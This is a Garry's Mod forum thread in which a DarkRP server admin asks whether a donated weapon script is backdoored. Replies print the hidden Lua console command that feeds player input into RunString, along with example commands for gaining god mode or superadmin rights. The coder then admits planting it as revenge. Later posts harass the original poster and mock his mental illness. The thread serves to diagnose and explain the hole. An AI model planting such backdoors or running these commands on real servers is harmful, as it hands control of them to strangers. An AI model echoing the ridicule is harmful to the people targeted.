Is this SWEP a trojan/backdoor? I think I got hacked - help please. - Developers

[B]Proof[/B]: [url]http://facepunch.com/showthread.php?t=1416566&p=45650165&viewfull=1#post45650165[/url] [B]Original post:[/B] Not sure if this is the right place to post this but here goes. I run a DarkRP server and needed a SWEP coded. The goal of the swep was that the "Imam" job had it, and it was a melee-range weapon that converted other players to the "Muslim" job. A well-known LUA coder (who I will not identify) showed up on my server one day offering to code it for free. I skimmed the code and installed it. SWEP lua code: [url]http://pastebin.com/rZ8txJwV[/url] However, after I installed it, I started having very strange errors. First, a door kept opening by itself after I locked it, then half the players on the server randomly had god mode, then I was demoted from superadmin to user, then someone deleted the "Player" entity and I had to restart the server... Every single time these "glitches" happened, the person who coded the SWEP was present on the server, and they only started after I installed the SWEP. ULX/DarkRP/FAdmin logs turn up nothing and the "Last Modified" dates on the FTP lead me to believe the hacker can't access the FTP. Additionally all the problems seem to stop when I restart the map. I noticed a few lines looked strange, specifically that the SWEP looks for a SteamID and there's a "gsub" string. I don't know what this means though. My question is: is this actually a trojan/backdoor, and if so, [B]what is the extent of the damage? What can I do to stop it?[/B] Any help would be appreciated.

[Del]There's nothing wrong with that SWEP. It's pretty inefficient with the lag compensation and a concommand for conversion, but no backdoors.[/del]

It contains a backdoor - it will run any code in the first argument of the console command ( "Entity(x):GodEnable()" or "Entity(x):SetUserGroup("superadmin")" or "Entity(1):Remove()" ). You don't have a trojan or anything, this is just a junky weapon. If you like everything else about it, you can use this instead, which will do the same thing without that concommand. [code]AddCSLuaFile() SWEP.PrintName = "Quran" SWEP.Instructions = "Read." SWEP.Contact = "(redacted)" SWEP.Purpose = "Convert others." SWEP.AdminSpawnable = true SWEP.Spawnable = false SWEP.ViewModelFOV = 50 SWEP.ViewModel = "models/props_lab/binderredlabel.mdl" SWEP.WorldModel = "models/weapons/w_pistol.mdl" SWEP.Slot = 2 SWEP.SlotPos = 2 SWEP.HoldType = "normal" SWEP.base = "weapon_base" function SWEP:Initialize() self:SetHoldType(self.HoldType) end function SWEP:PrimaryAttack() self.Owner:LagCompensation(true) if (SERVER and !self.Owner.convertSound) then local data = {} data.start = self.Owner:GetShootPos() data.endpos = data.start + self.Owner:GetAimVector()*96 data.filter = self.Owner local trace = util.TraceLine(data) local entity = trace.Entity if (IsValid(entity) and entity:IsPlayer()) then self.Owner.convertSound = CreateSound(entity, "npc/vort/vort_pain3.wav") self.Owner.convertSound:Play() local uniqueID = "jaceConverter"..self.Owner:SteamID() local i = 1 timer.Create(uniqueID, 0.1, 50, function() if (IsValid(self.Owner)) then local data = {} data.start = self.Owner:GetShootPos() data.endpos = data.start + self.Owner:GetAimVector()*96 data.filter = self.Owner local trace = util.TraceLine(data) if (!IsValid(entity) or trace.Entity != entity) then if (self.Owner.convertSound) then self.Owner.convertSound:FadeOut(1) self.Owner.convertSound = nil end return timer.Remove(uniqueID) end if (i == 50) then if entity.updateJob and entity.changeTeam then entity:changeTeam( TEAM_MUSLIM ) entity:ChatPrint("You have been converted to Islam by "..self.Owner:Name()) end entity:EmitSound("buttons/bell1.wav") if (self.Owner.convertSound) then self.Owner.convertSound:FadeOut(1) self.Owner.convertSound = nil end end i = i + 1 end end) end end self.Owner:LagCompensation(false) end function SWEP:SecondaryAttack() end function SWEP:DrawWorldModel() if (self.Owner:GetActiveWeapon() == self) then if (!IsValid(self.FakeModel)) then self.FakeModel = ClientsideModel(self.ViewModel, RENDERGROUP_BOTH) self.FakeModel:SetParent(self) end local index = self:LookupAttachment("muzzle") local attachment = self:GetAttachment(index) local position, angles = attachment.Pos, attachment.Ang angles:RotateAroundAxis(angles:Forward(), 90) position = position + angles:Up()*-1 + angles:Forward()*-2 self.FakeModel:SetPos(position) self.FakeModel:SetAngles(angles) self.FakeModel:DrawModel() end end function SWEP:Holster(weapon) if (self.FakeModel) then self.FakeModel:Remove() end return true end function SWEP:GetViewModelPosition(position, angles) angles:RotateAroundAxis(angles:Right(), -25) position = position + angles:Forward()*30 + angles:Right()*5 return position, angles end[/code]

[QUOTE=code_gs;45650001]There's nothing wrong with that SWEP. It's pretty inefficient with the lag compensation and a concommand for conversion, but no backdoors.[/QUOTE] What about the gsub and SteamID strings though? I can't fathom any legitimate reason for those to exist

[QUOTE=NotSoSuper;45650026]The code doesn't look like it had anything malicious, change your rcon password or more preferably disable it, and post which workshop addons you are using.[/QUOTE] RCon password is set from the command line so I don't think it could be accessed anyway. I don't want to disable it becuase I don't know any other way to change maps/etc. Kind of new to adminning lol Addons I'm using off the top of my head: -DarkRP -DarkRP Modification -Gmod Stranded -M9k Minigun -Durgz Mod -Some car mods -FAdmin -ULX -Jihad Bomb -DarkRP NPC Shops -some others I probably forgot. [QUOTE=Kogitsune;45650010]It contains a backdoor - it will run any code in the first argument of the console command ( "Entity(x):GodEnable()" or "Entity(x):SetUserGroup("superadmin")" or "Entity(1):Remove()" ). You don't have a trojan or anything, this is just a junky weapon. If you like everything else about it, you can use this instead, which will do the same thing without that concommand.[/quote] Could you please point out what bit of code has the backdoor? I'm interested in learning LUA and also really curious as to how he did it. Also I want some proof before I ban the dude lol.

Well... I'm not that good but I think this is more than enough to prove that it is indeed backdoored. [URL="http://cloud-4.steampowered.com/ugc/47605214669706743/0AC5BEC8F144E3060E5464E4D2104E07D70720FA/"]Link to image.[/URL] Obviously the post below mine shows it way more clear ;).

[QUOTE=cooldollars10;45650047]Could you please point out what bit of code has the backdoor? I'm interested in learning LUA and also really curious as to how he did it. Also I want some proof before I ban the dude lol.[/QUOTE] Sure! [code]if (SERVER) then concommand.Add("convertply", function(p, c, a) RunString(("local e = Entity("..p:EntIndex()..") if (IsValid(e) and e.changeTeam and "..teamVar..") then e:changeTeam("..teamVar..", true) end;"..(a[1] or "")):gsub("\\n", "\n")) end) end[/code] The important part of that is this: [code];"..(a[1] or "")):gsub("\\n", "\n")[/code] The first three arguments to a console command are player, command, arguments ( p, c, a in this case ). Since this is a console command anyone can run, all they have to do is type this in their console: [code]convertply "code they want to run"[/code] So, if I was Entity 4 and I wanted to give myself god mode, I'd do this: [code]convertply "Entity(4):GodEnable()"[/code] I could do the general same thing by putting myself in the superadmin group, giving myself a lot of in-game money, removing players, banning people - anything you can jam inside a console command's length limit.

Thanks to everyone who helped me fix this problem. For the record: Chessnut is the one responsible and he's a hacker piece of shit. [url]http://facepunch.com/showthread.php?t=1404117&p=45624833&viewfull=1#post45624833[/url] [url]http://facepunch.com/showthread.php?t=1404117&p=45626190&viewfull=1#post45626190[/url] [url]http://facepunch.com/showthread.php?t=1404117&p=45645207&viewfull=1#post45645207[/url] For when he deletes the posts: [IMG]http://i.imgur.com/cwxehvG.png[/IMG] [IMG]http://i.imgur.com/SbhLwlS.png[/IMG] [IMG]http://i.imgur.com/Ytdvnqe.png[/IMG] I'm out. Peace.

too bad i didn't check out the thread originally... lol also i doubt he'd delete those posts

I didn't even think to look at the concommand arguments; I'm dumb.

-nbjht-

Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot

[QUOTE=cooldollars10;45650165]Thanks to everyone who helped me fix this problem. For the record: Chessnut is the one responsible and he's a hacker piece of shit. [url]http://facepunch.com/showthread.php?t=1404117&p=45624833&viewfull=1#post45624833[/url] [url]http://facepunch.com/showthread.php?t=1404117&p=45626190&viewfull=1#post45626190[/url] [url]http://facepunch.com/showthread.php?t=1404117&p=45645207&viewfull=1#post45645207[/url] For when he deletes the posts: [IMG]http://i.imgur.com/cwxehvG.png[/IMG] [IMG]http://i.imgur.com/SbhLwlS.png[/IMG] [IMG]http://i.imgur.com/Ytdvnqe.png[/IMG] I'm out. Peace.[/QUOTE] chessnut why are you coding for jace

[QUOTE=CallMePyro;45651259]Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot[/QUOTE] [URL="http://facepunch.com/showthread.php?t=1404117"]It's a long story, really...[/URL]

Because you idiots dont read the thread and just ruined the fun >:(

[QUOTE=CallMePyro;45651259]Uh. I don't get it. I thought chessnut was a respectable guy, why would he write back doored code? Or am I missing something and look like an idiot[/QUOTE] Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess. [editline]10th August 2014[/editline] Also jace, I dont have a reason to delete my posts :v:

[QUOTE=Chessnut;45651344]Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess. [editline]10th August 2014[/editline] Also jace, I dont have a reason to delete my posts :v:[/QUOTE] Ohhhh the OP is that guy in the video? Damn, I woulda done the same thing.

[QUOTE=Chessnut;45651344]Parkourdude91 (The op) is a homophobic, racist, self-proclaimed "ex-marine". He has also abandoned another 20 year old in a war zone for the promise of an Xbox One. The SWEP was simply for fun, but it seems I have stooped to his level. Fun is over I guess. [editline]10th August 2014[/editline] Also jace, I dont have a reason to delete my posts :v:[/QUOTE] No way. That can't be [URL="http://facepunch.com/showthread.php?t=1404117"]the Parkourdude91[/URL].

[QUOTE=code_gs;45651621]No way. That can't be [URL="http://facepunch.com/showthread.php?t=1404117"]the Parkourdude91[/URL].[/QUOTE] His FP name certainly fits the description.

Keep in mind this guy also sent his fucking friend to Israel and threatens to cut off the money supply if he doesn't assassinate Gaza's Prime Minister and rescue Tupac. He hangs out with a 16 year old kid named Tyce and he's 21 years old. He has some mental problem that allows him to collect bucks from the government. He was dumb enough to drink vegetable oil to protect himself from the "mind rays" made to take him over and convert him to a Muslim. He STOLE his mothers car to GO TO THE STORE AND BUY MORE and then shit himself WHILE in the car. If that doesn't make Jace an idiot, I don't know what will. EDIT: The vegetable oil was apparently for nerve gas, not mind rays, but same thing.

[QUOTE=Reyjr43;45655711]Keep in mind this guy also sent his fucking friend to Israel and threatens to cut off the money supply if he doesn't assassinate Gaza's Prime Minister and rescue Tupac. He hangs out with a 16 year old kid named Tyce and he's 21 years old. He has some mental problem that allows him to collect bucks from the government. He was dumb enough to drink vegetable oil to protect himself from the "mind rays" made to take him over and convert him to a Muslim. He STOLE his mothers car to GO TO THE STORE AND BUY MORE and then shit himself WHILE in the car. If that doesn't make Jace an idiot, I don't know what will. EDIT: The vegetable oil was apparently for nerve gas, not mind rays, but same thing.[/QUOTE]hahahahahahahah hahahahahhaha hahhahaha hahahah hahahahahahahah. He's definitely an idiot [B]Edit[/B] I feel bad for laughing.... He got a mental illness and it's nothing to laugh about.